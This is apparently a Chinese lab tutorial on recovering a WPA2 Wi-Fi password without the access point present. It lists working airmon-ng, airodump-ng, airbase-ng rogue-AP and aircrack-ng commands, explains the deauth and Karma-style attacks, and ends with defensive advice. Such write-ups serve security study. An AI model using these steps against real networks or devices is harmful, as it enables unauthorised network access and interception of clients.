0x01 原理介绍
在目标AP已有合法客户端连接的情况下,可以通过airodump-ng侦听数据包,然后用aireplay-ng的deauth强制合法客户端掉线,掉线后客户端会尝试重新连接AP,此时会产生握手包。如果成功抓取到该握手包,则可以用字典进行本地离线破解。使用这种方法进行攻击的前提有两个:1、必须处在目标AP的信号范围内。2、已有合法客户端连接该AP。
在客户端开启无线,但是没有与目标AP连接的情况下,可以通过airbase-ng伪造目标AP来欺骗客户端与其连接,这时也会产生握手包,通过这个握手包,同样可以实现破解目标AP无线密码以及入侵该客户端。
0x02 实验准备
Kali物理机,手机A(创建一个名为Hack_WiFi_Without_AP的热点),手机B(连接热点,然后关闭手机A热点,不关闭手机B的无线)
0x03 实验步骤
关闭会影响抓包的进程,网卡开启侦听模式
airmon-ng check kill
airmon-ng start wlan0
启用airodump-ng扫描周围的无线信号
airodump-ng wlan0mon
74:AD:B7:A7:CB:A2是手机B的网卡MAC地址,处于not associated状态,所以手机B此时扫描周围是否有曾经连接过的AP,如有则尝试连接。可以看到c此时正在搜索曾经连过的BSSID名为ChinaNet-qQRH和Hack_WiFi_Without_AP的这两个AP
指定Hack_WiFi_Without_AP进行抓包,结果命名为test
airodump-ng wlan0mon --essid Hack_WiFi_Without_AP -w test
用airbase-ng构造一个同名的虚假AP
airbase-ng --essid Hack_WiFi_Without_AP -c 6 -Z 4 wlan0mon
-c代表channel信道,-Z代表WPA2加密,参数4是指定CCMP加密
P.S. -z代表WPA1加密,参数1~5分别表示WEP40、TKIP、WRAP、CCMP、WEP104,与-Z共用
手机B发现这个ESSID和加密方式相同的虚假AP,发送握手包
用字典离线破解密码
aircrack-ng -w 字典文件 test-01.cap
0x04 题外话
相比于传统的打掉客户端进行deauth攻击,本以为无AP破解WiFi这个思路比较鸡肋,因为即使你得到WiFi密码可是AP不在范围内照样连不上。直到我看到了tk教主的老司机的BlackHat手册——衣食住行和WiFi,文中说道:参加任何安全大会,最重要的事儿都是关闭手机WiFi,主要是防Karma攻击——只要你之前连接过任何一个无密码的WiFi,攻击者就可以让你的手机认为又来到了这个WiFi旁边,并连接上去。看来猥琐的思路最重要,重心不一定是在AP端,也可以是客户端。